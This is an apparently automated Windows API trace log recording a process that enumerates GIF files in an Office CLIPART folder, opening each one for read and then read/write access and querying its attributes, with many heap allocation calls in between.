[0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.683] AreFileApisANSI () returned 1 [0100.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.684] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.684] AreFileApisANSI () returned 1 [0100.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0100.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 69 [0100.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.684] GetFileType (hFile=0x33c) returned 0x1 [0100.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0100.685] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.685] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.685] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.685] CloseHandle (hObject=0x33c) returned 1 [0100.685] AreFileApisANSI () returned 1 [0100.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0100.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 69 [0100.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.685] GetFileType (hFile=0x33c) returned 0x1 [0100.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.686] CloseHandle (hObject=0x33c) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.687] AreFileApisANSI () returned 1 [0100.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0100.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 69 [0100.687] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c3)) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.687] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.687] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.687] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00157_.GIF", cAlternateFileName="")) returned 1 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.687] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.688] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.688] AreFileApisANSI () returned 1 [0100.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.688] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.689] AreFileApisANSI () returned 1 [0100.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 69 [0100.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.763] GetFileType (hFile=0x33c) returned 0x1 [0100.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.763] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.765] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.766] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.768] CloseHandle (hObject=0x33c) returned 1 [0100.771] AreFileApisANSI () returned 1 [0100.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 69 [0100.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0100.772] GetFileType (hFile=0x33c) returned 0x1 [0100.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.775] CloseHandle (hObject=0x33c) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.791] AreFileApisANSI () returned 1 [0100.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0100.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 69 [0100.792] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00157_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, 